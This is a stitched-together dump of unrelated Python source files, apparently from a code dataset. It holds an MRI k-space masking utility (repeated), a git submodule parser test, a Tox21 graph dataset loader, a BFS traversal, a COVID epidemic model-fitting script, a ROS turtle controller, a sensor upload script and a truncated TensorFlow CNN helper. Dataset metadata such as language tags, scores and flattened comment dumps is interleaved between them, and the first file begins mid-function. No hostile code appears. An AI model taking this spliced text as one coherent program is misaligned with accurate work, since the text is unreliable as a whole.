In contrast, for pytorch, where complex-valued arrays are stored as two-channeled
signals, the mask has replicate the support of the indices for both channels
"""
nx,ny,nt = shape
mask = np.zeros(shape)
for kt in range(nt):
mask[:,:,kt] = cartesian_mask((nx,ny),acc_factor)
if mode=='pytorch':
mask = ifftshift(mask,axes=[0,1])
mask = (1+1j)*mask #has shape (nx,ny,nt)
#make a torch-tensor of shape (1,2,nx,ny,nt) out of it
mask = cplx_np2torch(mask, 0).unsqueeze(0)
return mask
def load_data(Ids):
"""
function for loading the image data of patients indexed by the set
Ids and stack all different slices to have (N,Nx,Ny,Nt), where
N is the total number of cine MR images.
"""
#initalize list of images
pats_list = []
for pid in Ids:
#load image
img = np.load('data/np_arrays/xf_pat{}.npy'.format(pid))
img = np.moveaxis(img,(0,1,2,3),(1,2,0,3))
pats_list.append(img)
print(img.shape)
xf = np.concatenate(pats_list,axis=0)
return xf
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
A collection of auxiliary functions for manipulating data.
"""
import numpy as np
import torch
from numpy.lib.stride_tricks import as_strided
from numpy.fft import ifftshift
import sys
sys.path.append('../')
def random_phase(img):
"""
function for generating a random phase-profile
"""
#get shape of in-plane image
Nx,Ny = img.shape[:2]
x = np.linspace(-np.pi, np.pi, Nx)
y = np.linspace(-np.pi, np.pi, Ny)
#generate parameters to create a random phase profile with values
xx, yy = np.meshgrid(x, y)
a, b,c,d,e = np.random.random(5)
z = a*np.sin(b*xx-c) + (1-a)*np.cos(d*yy-e)
#bring to [-np.pi, np.pi]
z = (np.pi- (-np.pi))*(z-np.min(z))/(np.max(z)-np.min(z)) + (-np.pi)
return z
def cplx_np2torch(x,dim):
"""
functon for converting a complex-valued np.array x
to a complex-valued torch-tensor, where the 2 channels
for the real and imaginary parts are inserted as "dim" dimension
"""
x = torch.stack([torch.tensor(np.real(x)),torch.tensor(np.imag(x))],dim=dim)
return x
def cplx_torch2np(x,dim):
"""
functon for converting a complex-valued torch-tensors to a complex-valued numpy array
the parameter "dim" indicates which dimension is used to stre the real
and the imaginary part in the torch-tensor
first, the tensor is transposed, such that we can access te real and the imaginry parts
the output is a complex-valued numpy array where the dimension "dim" is dropped
"""
#permutes the axis "dim" and 0
#now, the 0-th axis contains the real and imainary parts
x = torch.transpose(x,dim,0)
if x.is_cuda:
x = x.cpu()
#get the real and imaginry parts
xr = x[0,...].numpy()
xi = x[1,...].numpy()
x = xr+1j*xi
#expand dimensions in order to be able to get back to original shape
x = np.expand_dims(x,axis=0)
x = np.swapaxes(x,0,dim)
#drop the dimension "dim"
x = np.squeeze(x,axis=dim)
return x
def random_mask(img, acc_factor=4):
"""
function for generating a random binary massk.
For each time point, the mask is different for incoherent undersampling.
"""
def normal_pdf(length, sensitivity):
return np.exp(-sensitivity * (np.arange(length) - length / 2)**2)
def cartesian_mask(shape, acc, sample_n=10):
"""
Sampling density estimated from implementation of kt FOCUSS
shape: tuple - of form (..., nx, ny)
acc: float - doesn't have to be integer 4, 8, etc..
Note:
function borrowed from <NAME> from
https://github.com/js3611/Deep-MRI-Reconstruction/blob/master/utils/compressed_sensing.py
"""
N, Nx, Ny = int(np.prod(shape[:-2])), shape[-2], shape[-1]
pdf_x = normal_pdf(Nx, 0.5/(Nx/10.)**2)
lmda = Nx/(2.*acc)
n_lines = int(Nx / acc)
# add uniform distribution
pdf_x += lmda * 1./Nx
if sample_n:
pdf_x[Nx//2-sample_n//2:Nx//2+sample_n//2] = 0
pdf_x /= np.sum(pdf_x)
n_lines -= sample_n
mask = np.zeros((N, Nx))
for i in range(N):
idx = np.random.choice(Nx, n_lines, False, pdf_x)
mask[i, idx] = 1
if sample_n:
mask[:, Nx//2-sample_n//2:Nx//2+sample_n//2] = 1
size = mask.itemsize
mask = as_strided(mask, (N, Nx, Ny), (size * Nx, size, 0))
mask = mask.reshape(shape)
return mask
def cine_cartesian_mask(shape,acc_factor,mode='numpy'):
"""
create a binary mask for a 2d cine MR image sequence:
N.B. for numpy, the binary mask is only real-valued, but this suffices
as when computing the product of a complex-valued array with a ral-valued
one, the output is complex-valued. This is because, for \mathbb{C}, the one-element
is given by 1=1+0*j.
In contrast, for pytorch, where complex-valued arrays are stored as two-channeled
signals, the mask has replicate the support of the indices for both channels
"""
nx,ny,nt = shape
mask = np.zeros(shape)
for kt in range(nt):
mask[:,:,kt] = cartesian_mask((nx,ny),acc_factor)
if mode=='pytorch':
mask = ifftshift(mask,axes=[0,1])
mask = (1+1j)*mask #has shape (nx,ny,nt)
#make a torch-tensor of shape (1,2,nx,ny,nt) out of it
mask = cplx_np2torch(mask, 0).unsqueeze(0)
return mask
def load_data(Ids):
"""
function for loading the image data of patients indexed by the set
Ids and stack all different slices to have (N,Nx,Ny,Nt), where
N is the total number of cine MR images.
"""
#initalize list of images
pats_list = []
for pid in Ids:
#load image
img = np.load('data/np_arrays/xf_pat{}.npy'.format(pid))
img = np.moveaxis(img,(0,1,2,3),(1,2,0,3))
pats_list.append(img)
print(img.shape)
xf = np.concatenate(pats_list,axis=0)
return xf
| en | 0.844069 | #!/usr/bin/env python3 # -*- coding: utf-8 -*- A collection of auxiliary functions for manipulating data. function for generating a random phase-profile #get shape of in-plane image #generate parameters to create a random phase profile with values #bring to [-np.pi, np.pi] functon for converting a complex-valued np.array x to a complex-valued torch-tensor, where the 2 channels for the real and imaginary parts are inserted as "dim" dimension functon for converting a complex-valued torch-tensors to a complex-valued numpy array the parameter "dim" indicates which dimension is used to stre the real and the imaginary part in the torch-tensor first, the tensor is transposed, such that we can access te real and the imaginry parts the output is a complex-valued numpy array where the dimension "dim" is dropped #permutes the axis "dim" and 0 #now, the 0-th axis contains the real and imainary parts #get the real and imaginry parts #expand dimensions in order to be able to get back to original shape #drop the dimension "dim" function for generating a random binary massk. For each time point, the mask is different for incoherent undersampling. Sampling density estimated from implementation of kt FOCUSS shape: tuple - of form (..., nx, ny) acc: float - doesn't have to be integer 4, 8, etc.. Note: function borrowed from <NAME> from https://github.com/js3611/Deep-MRI-Reconstruction/blob/master/utils/compressed_sensing.py # add uniform distribution create a binary mask for a 2d cine MR image sequence: N.B. for numpy, the binary mask is only real-valued, but this suffices as when computing the product of a complex-valued array with a ral-valued one, the output is complex-valued. This is because, for \mathbb{C}, the one-element is given by 1=1+0*j. In contrast, for pytorch, where complex-valued arrays are stored as two-channeled signals, the mask has replicate the support of the indices for both channels #has shape (nx,ny,nt) #make a torch-tensor of shape (1,2,nx,ny,nt) out of it function for loading the image data of patients indexed by the set Ids and stack all different slices to have (N,Nx,Ny,Nt), where N is the total number of cine MR images. #initalize list of images #load image | 2.851647 | 3 |
tests/lib/bes/git/test_git_submodule_info.py | reconstruir/bes | 0 | 6616815 | <gh_stars>0
#!/usr/bin/env python
#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
from bes.testing.unit_test import unit_test
from bes.git.git_submodule_info import git_submodule_info as SI
class test_git_submodule_info(unit_test):
def test_parse_not_current(self):
self.assertEqual( ( 'sub1', None, '1234567890abcdef1234567890abcdef12345678', None, False, None ),
SI.parse('-1234567890abcdef1234567890abcdef12345678 sub1') )
def test_parse_current(self):
self.assertEqual( ( 'sub1', None, '1234567890abcdef1234567890abcdef12345678', None, True, None ),
SI.parse(' 1234567890abcdef1234567890abcdef12345678 sub1') )
def test_parse_not_current_with_tag(self):
self.assertEqual( ( 'sub1', None, '1234567890abcdef1234567890abcdef12345678', None, False, 'tag666' ),
SI.parse('-1234567890abcdef1234567890abcdef12345678 sub1 (tag666)') )
def test_parse_current_with_tag(self):
self.assertEqual( ( 'sub1', None, '1234567890abcdef1234567890abcdef12345678', None, True, 'tag666' ),
SI.parse(' 1234567890abcdef1234567890abcdef12345678 sub1 (tag666)') )
if __name__ == '__main__':
unit_test.main()
| #!/usr/bin/env python
#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
from bes.testing.unit_test import unit_test
from bes.git.git_submodule_info import git_submodule_info as SI
class test_git_submodule_info(unit_test):
def test_parse_not_current(self):
self.assertEqual( ( 'sub1', None, '1234567890abcdef1234567890abcdef12345678', None, False, None ),
SI.parse('-1234567890abcdef1234567890abcdef12345678 sub1') )
def test_parse_current(self):
self.assertEqual( ( 'sub1', None, '1234567890abcdef1234567890abcdef12345678', None, True, None ),
SI.parse(' 1234567890abcdef1234567890abcdef12345678 sub1') )
def test_parse_not_current_with_tag(self):
self.assertEqual( ( 'sub1', None, '1234567890abcdef1234567890abcdef12345678', None, False, 'tag666' ),
SI.parse('-1234567890abcdef1234567890abcdef12345678 sub1 (tag666)') )
def test_parse_current_with_tag(self):
self.assertEqual( ( 'sub1', None, '1234567890abcdef1234567890abcdef12345678', None, True, 'tag666' ),
SI.parse(' 1234567890abcdef1234567890abcdef12345678 sub1 (tag666)') )
if __name__ == '__main__':
unit_test.main() | en | 0.461035 | #!/usr/bin/env python #-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*- | 2.350033 | 2 |
universal_computation/datasets/tox21.py | alex-kj-chin/universal-computation | 0 | 6616816 | <filename>universal_computation/datasets/tox21.py
from universal_computation.datasets.dataset import Dataset
from torch_geometric.datasets import MoleculeNet
from torch_geometric.data import DataLoader
class Tox21Dataset(Dataset):
def __init__(self, batch_size, *args, **kwargs):
super().__init__(*args, **kwargs)
self.data = MoleculeNet(root="data/tox21", name="Tox21")
self.data_size = len(self.data)
self.d_train = DataLoader(
self.data[:int(self.data_size * .8)], batch_size=batch_size, drop_last=True, shuffle=True,
)
self.d_test = DataLoader(
self.data[int(self.data_size * .8):], batch_size=batch_size, drop_last=True, shuffle=True,
)
self.train_enum = enumerate(self.d_train)
self.test_enum = enumerate(self.d_test)
def get_batch(self, batch_size=None, train=True):
if train:
_, (x, y) = next(self.train_enum, (None, (None, None)))
if x is None:
self.train_enum = enumerate(self.d_train)
_, (x, y) = next(self.train_enum)
else:
_, (x, y) = next(self.test_enum, (None, (None, None)))
if x is None:
self.test_enum = enumerate(self.d_test)
_, (x, y) = next(self.test_enum)
x = x.to(device=self.device)
y = y.to(device=self.device)
self._ind += 1
return x, y
| <filename>universal_computation/datasets/tox21.py
from universal_computation.datasets.dataset import Dataset
from torch_geometric.datasets import MoleculeNet
from torch_geometric.data import DataLoader
class Tox21Dataset(Dataset):
def __init__(self, batch_size, *args, **kwargs):
super().__init__(*args, **kwargs)
self.data = MoleculeNet(root="data/tox21", name="Tox21")
self.data_size = len(self.data)
self.d_train = DataLoader(
self.data[:int(self.data_size * .8)], batch_size=batch_size, drop_last=True, shuffle=True,
)
self.d_test = DataLoader(
self.data[int(self.data_size * .8):], batch_size=batch_size, drop_last=True, shuffle=True,
)
self.train_enum = enumerate(self.d_train)
self.test_enum = enumerate(self.d_test)
def get_batch(self, batch_size=None, train=True):
if train:
_, (x, y) = next(self.train_enum, (None, (None, None)))
if x is None:
self.train_enum = enumerate(self.d_train)
_, (x, y) = next(self.train_enum)
else:
_, (x, y) = next(self.test_enum, (None, (None, None)))
if x is None:
self.test_enum = enumerate(self.d_test)
_, (x, y) = next(self.test_enum)
x = x.to(device=self.device)
y = y.to(device=self.device)
self._ind += 1
return x, y
| none | 1 | 2.17759 | 2 | |
027-tree_bfs.py | lzit/python-100 | 39 | 6616817 | from bst import Bst
from collections import deque
class BstBfs(Bst):
def bfs(self, visit_func):
if self.root is None:
raise TypeError('root is None')
queue = deque()
queue.append(self.root)
while queue:
node = queue.popleft()
visit_func(node)
if node.left is not None:
queue.append(node.left)
if node.right is not None:
queue.append(node.right) | from bst import Bst
from collections import deque
class BstBfs(Bst):
def bfs(self, visit_func):
if self.root is None:
raise TypeError('root is None')
queue = deque()
queue.append(self.root)
while queue:
node = queue.popleft()
visit_func(node)
if node.left is not None:
queue.append(node.left)
if node.right is not None:
queue.append(node.right) | none | 1 | 3.452847 | 3 | |
clipper_admin/clipper_admin/metrics/__init__.py | DNCoelho/clipper | 1,403 | 6616818 | from __future__ import absolute_import
from ..version import __version__
from .client import add_metric, report_metric
from . import server
if not server.redis_daemon_exist():
server.start_redis_daemon()
| from __future__ import absolute_import
from ..version import __version__
from .client import add_metric, report_metric
from . import server
if not server.redis_daemon_exist():
server.start_redis_daemon()
| none | 1 | 1.366785 | 1 | |
jupyter.py | takacsistvan01010101/OCR_API | 0 | 6616819 | # load mnist data
from tensorflow.python.keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
#####################################################################################
# display an image from mnist
import matplotlib.pyplot as plt
i = 2
plt.imshow(x_train[i])
print (y_train[i])
print x_train[i].shape
#####################################################################################
# upload and save file
from google.colab import files
uploaded = files.upload()
for fn in uploaded.keys():
print('User uploaded file "{name}" with length {length} bytes'.format(
name=fn, length=len(uploaded[fn])))
filename = 'test1.png'
with open(filename, 'w') as f:
f.write(uploaded[filename])
#####################################################################################
# load and display image
from PIL import Image
x = Image.open('test1.png')
import matplotlib.pyplot as plt
plt.imshow(x) | # load mnist data
from tensorflow.python.keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
#####################################################################################
# display an image from mnist
import matplotlib.pyplot as plt
i = 2
plt.imshow(x_train[i])
print (y_train[i])
print x_train[i].shape
#####################################################################################
# upload and save file
from google.colab import files
uploaded = files.upload()
for fn in uploaded.keys():
print('User uploaded file "{name}" with length {length} bytes'.format(
name=fn, length=len(uploaded[fn])))
filename = 'test1.png'
with open(filename, 'w') as f:
f.write(uploaded[filename])
#####################################################################################
# load and display image
from PIL import Image
x = Image.open('test1.png')
import matplotlib.pyplot as plt
plt.imshow(x) | de | 0.766857 | # load mnist data ##################################################################################### # display an image from mnist ##################################################################################### # upload and save file ##################################################################################### # load and display image | 3.42155 | 3 |
Comparison.py | layjain/BRD-21 | 0 | 6616820 | from CoronaVIRES_1 import CoronaVIRES_1
from SEIR_1 import SEIR_Baseline
from scipy.optimize import curve_fit
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from operator import itemgetter
from utils import *
TAU = 0.9
np.seterr("raise")
owid_df = pd.read_csv("owid/owid-covid-data-new.csv")
"""
Get the top few countries
"""
country_to_vaccination_days_count = {}
for country_location in owid_df["location"].unique():
# country_location = "United States"
owid_country=owid_df.loc[owid_df['location']==country_location]
count = owid_country["total_vaccinations"].dropna().count()
country_to_vaccination_days_count[country_location] = count
# See top 10 countries data we have data for
top_few = dict(sorted(country_to_vaccination_days_count.items(), key=itemgetter(1), reverse=True)[:10])
results_df = pd.DataFrame()
results_df["Errors/Countries"] = ["CoronaVIRES","SEIRV"]
for country_location in list(top_few)+["United States"]:
#Baseline Model cannot fit this to the desired accuracy and runs out of function calls
if country_location in []:
continue
# Example: country_location = "Italy"
owid_country = owid_df.loc[owid_df['location']==country_location]
# Filter relavant dates since vaccinations started (is Not NAN)
owid_country = owid_country[owid_country.total_vaccinations.notnull()]
#Series to Predict
N = list(owid_country["population"])[0]
_deaths = list(owid_country.total_deaths)
deaths = [e-_deaths[0] for e in _deaths]
deaths = [death*1/N for death in deaths] # standardize the deaths
train_deaths = deaths[:int(TAU*len(deaths))]
_dates = list(owid_country.date)
dates = [date_difference(e, _dates[0]) for e in _dates]
train_dates = dates[:int(TAU*len(deaths))]
N = 1
# Models
model_1 = CoronaVIRES_1(N)
model_base = SEIR_Baseline(N)
print(country_location)
def f2(t,alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0):
predicted_deaths = model_1.predict_Deaths_for_T_days(int(max(t)), alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0)
ret = []
for time in t:
ret.append(predicted_deaths[int(time)])
return ret
# alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0
lower_bounds = [0,0,0,0,0,0,0,0,0,0,N//2,N//10000,N//10000]
# lower_bounds = [0,0,0,0,0,0,0,0,0,0,N//3,N//100000,N//100000]
# alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0
# upper_bounds = [1, 0.5, 0.3, 0.2, 1, 0.1, 0.1, 0.2, 1, 0.5, N, N, N//10]
upper_bounds = [1, 0.5, 0.3, 0.2, 1, 0.1, 0.1, 0.2, 1, 0.5, N, N, N]
opt = curve_fit(f2, dates, deaths, bounds = (lower_bounds,upper_bounds))
def f1_base(t,alpha, beta, chi, dels, rho, theta, S0, Es0, Is0):
ret = []
for T in t:
death_T = model_base.predict_Deaths(int(T), alpha, beta, chi, dels, rho, theta, S0, Es0, Is0)
ret.append(death_T)
return ret
lower_bounds_base = [0, 0, 0, 0, 0, 0, N//3, N//100000,N//100000]
# alpha, beta, chi, dels, rho, theta, S0, Es0, Is0
# upper_bounds = [1, 0.5, 0.3, 0.2, 1, 0.1, 0.1, 0.2, 1, 0.5, N, N, N//10]
upper_bounds_base = [1, 0.5, 1, 0.1, 0.1, 0.5, N, N, N]
opt_base = curve_fit(f1_base, dates, deaths, bounds = (lower_bounds_base,upper_bounds_base))
#Plot
alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0 = opt[0]
alpha_base, beta_base, chi_base, dels_base, rho_base, theta_base, S0_base, Es0_base, Is0_base = opt_base[0]
model_final_1 = CoronaVIRES_1(N)
T = max(dates)
model_final_1.run_predict(T, alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0)
model_base_final = SEIR_Baseline(N)
model_base_final.run_predict(T, alpha_base, beta_base, chi_base, dels_base, rho_base, theta_base, S0_base, Es0_base, Is0_base)
print("Fitting Done,Plotting")
coronavires_e, base_e = calculate_errors(deaths,train_deaths,predicted_deaths = [model_final_1.D[i] for i in dates],predicted_deaths_base = [model_base_final.D[i] for i in dates])
results_df[country_location] = [coronavires_e, base_e]
plt.scatter(dates, [model_final_1.D[i] for i in dates], label = "CoronaVIRES", marker='.')
plt.scatter(dates, [model_base_final.D[i] for i in dates], label = "SEIR Baseline", marker='.')
plt.scatter(dates, deaths, label="Deaths Actual", marker='.')
# old_ticks = plt.xticks()
# plt.xticks(list(old_ticks[0])+[train_dates[-1]], old_ticks[1]+['End of Training data'])
plt.axvline(x=train_dates[-1], ymin=0, ymax=1, linestyle = "dashed")
# plt.scatter(owid_country.date, owid_country.total_vaccinations, label="Total Vaccinations")
plt.title(country_location)
plt.legend()
plt.xlabel("Days")
plt.ylabel("Death Counts(Normalized)")
plt.savefig("figures/Comparison_{}.png".format(country_location))
plt.show()
results_df.to_csv("Comparison.csv") | from CoronaVIRES_1 import CoronaVIRES_1
from SEIR_1 import SEIR_Baseline
from scipy.optimize import curve_fit
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from operator import itemgetter
from utils import *
TAU = 0.9
np.seterr("raise")
owid_df = pd.read_csv("owid/owid-covid-data-new.csv")
"""
Get the top few countries
"""
country_to_vaccination_days_count = {}
for country_location in owid_df["location"].unique():
# country_location = "United States"
owid_country=owid_df.loc[owid_df['location']==country_location]
count = owid_country["total_vaccinations"].dropna().count()
country_to_vaccination_days_count[country_location] = count
# See top 10 countries data we have data for
top_few = dict(sorted(country_to_vaccination_days_count.items(), key=itemgetter(1), reverse=True)[:10])
results_df = pd.DataFrame()
results_df["Errors/Countries"] = ["CoronaVIRES","SEIRV"]
for country_location in list(top_few)+["United States"]:
#Baseline Model cannot fit this to the desired accuracy and runs out of function calls
if country_location in []:
continue
# Example: country_location = "Italy"
owid_country = owid_df.loc[owid_df['location']==country_location]
# Filter relavant dates since vaccinations started (is Not NAN)
owid_country = owid_country[owid_country.total_vaccinations.notnull()]
#Series to Predict
N = list(owid_country["population"])[0]
_deaths = list(owid_country.total_deaths)
deaths = [e-_deaths[0] for e in _deaths]
deaths = [death*1/N for death in deaths] # standardize the deaths
train_deaths = deaths[:int(TAU*len(deaths))]
_dates = list(owid_country.date)
dates = [date_difference(e, _dates[0]) for e in _dates]
train_dates = dates[:int(TAU*len(deaths))]
N = 1
# Models
model_1 = CoronaVIRES_1(N)
model_base = SEIR_Baseline(N)
print(country_location)
def f2(t,alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0):
predicted_deaths = model_1.predict_Deaths_for_T_days(int(max(t)), alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0)
ret = []
for time in t:
ret.append(predicted_deaths[int(time)])
return ret
# alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0
lower_bounds = [0,0,0,0,0,0,0,0,0,0,N//2,N//10000,N//10000]
# lower_bounds = [0,0,0,0,0,0,0,0,0,0,N//3,N//100000,N//100000]
# alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0
# upper_bounds = [1, 0.5, 0.3, 0.2, 1, 0.1, 0.1, 0.2, 1, 0.5, N, N, N//10]
upper_bounds = [1, 0.5, 0.3, 0.2, 1, 0.1, 0.1, 0.2, 1, 0.5, N, N, N]
opt = curve_fit(f2, dates, deaths, bounds = (lower_bounds,upper_bounds))
def f1_base(t,alpha, beta, chi, dels, rho, theta, S0, Es0, Is0):
ret = []
for T in t:
death_T = model_base.predict_Deaths(int(T), alpha, beta, chi, dels, rho, theta, S0, Es0, Is0)
ret.append(death_T)
return ret
lower_bounds_base = [0, 0, 0, 0, 0, 0, N//3, N//100000,N//100000]
# alpha, beta, chi, dels, rho, theta, S0, Es0, Is0
# upper_bounds = [1, 0.5, 0.3, 0.2, 1, 0.1, 0.1, 0.2, 1, 0.5, N, N, N//10]
upper_bounds_base = [1, 0.5, 1, 0.1, 0.1, 0.5, N, N, N]
opt_base = curve_fit(f1_base, dates, deaths, bounds = (lower_bounds_base,upper_bounds_base))
#Plot
alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0 = opt[0]
alpha_base, beta_base, chi_base, dels_base, rho_base, theta_base, S0_base, Es0_base, Is0_base = opt_base[0]
model_final_1 = CoronaVIRES_1(N)
T = max(dates)
model_final_1.run_predict(T, alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0)
model_base_final = SEIR_Baseline(N)
model_base_final.run_predict(T, alpha_base, beta_base, chi_base, dels_base, rho_base, theta_base, S0_base, Es0_base, Is0_base)
print("Fitting Done,Plotting")
coronavires_e, base_e = calculate_errors(deaths,train_deaths,predicted_deaths = [model_final_1.D[i] for i in dates],predicted_deaths_base = [model_base_final.D[i] for i in dates])
results_df[country_location] = [coronavires_e, base_e]
plt.scatter(dates, [model_final_1.D[i] for i in dates], label = "CoronaVIRES", marker='.')
plt.scatter(dates, [model_base_final.D[i] for i in dates], label = "SEIR Baseline", marker='.')
plt.scatter(dates, deaths, label="Deaths Actual", marker='.')
# old_ticks = plt.xticks()
# plt.xticks(list(old_ticks[0])+[train_dates[-1]], old_ticks[1]+['End of Training data'])
plt.axvline(x=train_dates[-1], ymin=0, ymax=1, linestyle = "dashed")
# plt.scatter(owid_country.date, owid_country.total_vaccinations, label="Total Vaccinations")
plt.title(country_location)
plt.legend()
plt.xlabel("Days")
plt.ylabel("Death Counts(Normalized)")
plt.savefig("figures/Comparison_{}.png".format(country_location))
plt.show()
results_df.to_csv("Comparison.csv") | en | 0.660033 | Get the top few countries # country_location = "United States" # See top 10 countries data we have data for #Baseline Model cannot fit this to the desired accuracy and runs out of function calls # Example: country_location = "Italy" # Filter relavant dates since vaccinations started (is Not NAN) #Series to Predict # standardize the deaths # Models # alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0 # lower_bounds = [0,0,0,0,0,0,0,0,0,0,N//3,N//100000,N//100000] # alpha, beta, del1, del2, chi, dels, rho, phi, phi2, theta, S0, Es0, Is0 # upper_bounds = [1, 0.5, 0.3, 0.2, 1, 0.1, 0.1, 0.2, 1, 0.5, N, N, N//10] # alpha, beta, chi, dels, rho, theta, S0, Es0, Is0 # upper_bounds = [1, 0.5, 0.3, 0.2, 1, 0.1, 0.1, 0.2, 1, 0.5, N, N, N//10] #Plot # old_ticks = plt.xticks() # plt.xticks(list(old_ticks[0])+[train_dates[-1]], old_ticks[1]+['End of Training data']) # plt.scatter(owid_country.date, owid_country.total_vaccinations, label="Total Vaccinations") | 2.929884 | 3 |
week1/publisher.py | vietanhtran2710/ROS-UET | 0 | 6616821 | <filename>week1/publisher.py
import rospy
from geometry_msgs.msg import Twist
from math import pi
def turn_left():
print("Turning left (Spin 90 degrees - Pi radian)")
publish_velocity(0, pi / 2)
rate = rospy.Rate(1)
rate.sleep()
def move_forward(distance):
print("Moving forward " + str(distance) + "m")
publish_velocity(distance, 0)
rate = rospy.Rate(1)
rate.sleep()
def publish_velocity(linear_x, angular_z):
while publisher.get_num_connections() < 1:
pass
move_message = Twist()
move_message.linear.y = move_message.linear.z = 0.0
move_message.angular.z = move_message.angular.y = 0.0
move_message.linear.x = linear_x
move_message.angular.z = angular_z
publisher.publish(move_message)
rospy.init_node("controller", anonymous=False)
publisher = rospy.Publisher("turtle1/cmd_vel", Twist, queue_size=10000)
while publisher.get_num_connections() < 1:
pass
for i in range(4):
move_forward(2)
turn_left()
| <filename>week1/publisher.py
import rospy
from geometry_msgs.msg import Twist
from math import pi
def turn_left():
print("Turning left (Spin 90 degrees - Pi radian)")
publish_velocity(0, pi / 2)
rate = rospy.Rate(1)
rate.sleep()
def move_forward(distance):
print("Moving forward " + str(distance) + "m")
publish_velocity(distance, 0)
rate = rospy.Rate(1)
rate.sleep()
def publish_velocity(linear_x, angular_z):
while publisher.get_num_connections() < 1:
pass
move_message = Twist()
move_message.linear.y = move_message.linear.z = 0.0
move_message.angular.z = move_message.angular.y = 0.0
move_message.linear.x = linear_x
move_message.angular.z = angular_z
publisher.publish(move_message)
rospy.init_node("controller", anonymous=False)
publisher = rospy.Publisher("turtle1/cmd_vel", Twist, queue_size=10000)
while publisher.get_num_connections() < 1:
pass
for i in range(4):
move_forward(2)
turn_left()
| none | 1 | 3.225209 | 3 | |
tcc_rpi/enviarDados.py | MegaNo0body/tcc | 1 | 6616822 | import urllib.request
import urllib.parse
from os import listdir
from os.path import isfile, join
# Coleta o ID do sensor lendo o arquivo idSensor
f = open('idSensor', 'r')
idSensor = f.read().strip()
f.close()
# Cria a URL para a postagem
url = 'http://fernando.local:8081/tcc/sensor/' + idSensor + '/inserir'
# url = 'http://192.168.1.101:8081/tcc/sensor/' + idSensor + '/inserir'
# Define o diretorio de leitura dos dados
diretorio = 'dados'
# Os valores sao adicionados a um dicionario, que sera enviado ao servico
valores = {}
# Pegar os valores dos arquivos na pasta ./dados
# O nome de cada arquivo sera usado como o tipo do dado, o conteudo sera usado como valor.
for nome in listdir(diretorio):
# Junta o nome do arquivo com o diretorio
arquivo = join(diretorio, nome)
# Verifica se nome 'e um arquivo
if isfile(arquivo):
# Le o valor do arquivo
f = open(arquivo, 'r')
valor = f.read().strip()
f.close()
# Adiciona o novo valor para o dicionario de valores
valores[nome] = valor
print('POST %s\n%s' % (url, str(valores)))
# Faz a postagem para o servico
data = urllib.parse.urlencode(valores).encode('utf-8')
urllib.request.urlopen(url, data)
| import urllib.request
import urllib.parse
from os import listdir
from os.path import isfile, join
# Coleta o ID do sensor lendo o arquivo idSensor
f = open('idSensor', 'r')
idSensor = f.read().strip()
f.close()
# Cria a URL para a postagem
url = 'http://fernando.local:8081/tcc/sensor/' + idSensor + '/inserir'
# url = 'http://192.168.1.101:8081/tcc/sensor/' + idSensor + '/inserir'
# Define o diretorio de leitura dos dados
diretorio = 'dados'
# Os valores sao adicionados a um dicionario, que sera enviado ao servico
valores = {}
# Pegar os valores dos arquivos na pasta ./dados
# O nome de cada arquivo sera usado como o tipo do dado, o conteudo sera usado como valor.
for nome in listdir(diretorio):
# Junta o nome do arquivo com o diretorio
arquivo = join(diretorio, nome)
# Verifica se nome 'e um arquivo
if isfile(arquivo):
# Le o valor do arquivo
f = open(arquivo, 'r')
valor = f.read().strip()
f.close()
# Adiciona o novo valor para o dicionario de valores
valores[nome] = valor
print('POST %s\n%s' % (url, str(valores)))
# Faz a postagem para o servico
data = urllib.parse.urlencode(valores).encode('utf-8')
urllib.request.urlopen(url, data)
| pt | 0.809967 | # Coleta o ID do sensor lendo o arquivo idSensor # Cria a URL para a postagem # url = 'http://192.168.1.101:8081/tcc/sensor/' + idSensor + '/inserir' # Define o diretorio de leitura dos dados # Os valores sao adicionados a um dicionario, que sera enviado ao servico # Pegar os valores dos arquivos na pasta ./dados # O nome de cada arquivo sera usado como o tipo do dado, o conteudo sera usado como valor. # Junta o nome do arquivo com o diretorio # Verifica se nome 'e um arquivo # Le o valor do arquivo # Adiciona o novo valor para o dicionario de valores # Faz a postagem para o servico | 3.224416 | 3 |
code/utils.py | ndz96/car_model_recognition | 0 | 6616823 | import tensorflow as tf
import numpy as np
def create_weights(shape):
return tf.Variable(tf.truncated_normal(shape, stddev=0.05))
def create_biases(size):
return tf.Variable(tf.constant(0.05, shape=[size]))
def create_convolutional_layer(input,
num_input_channels,
conv_filter_size,
num_filters):
## We shall define the weights that will be trained using create_weights function.
weights = create_weights(shape=[conv_filter_size, conv_filter_size, num_input_channels, num_filters])
## We create biases using the create_biases function. These are also trained.
biases = create_biases(num_filters)
## Creating the convolutional layer
layer = tf.nn.conv2d(input=input,
filter=weights,
strides=[1, 1, 1, 1],
padding='SAME')
layer += biases
## We shall be using max-pooling.
layer = tf.nn.max_pool(value=layer,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
## Output of pooling is fed to Relu which is the activation function for us.
layer = tf.nn.relu(layer)
return layer
def create_flatten_layer(layer):
#We know that the shape of the layer will be [batch_size img_size img_size num_channels]
# But let's get it from the previous layer.
layer_shape = layer.get_shape()
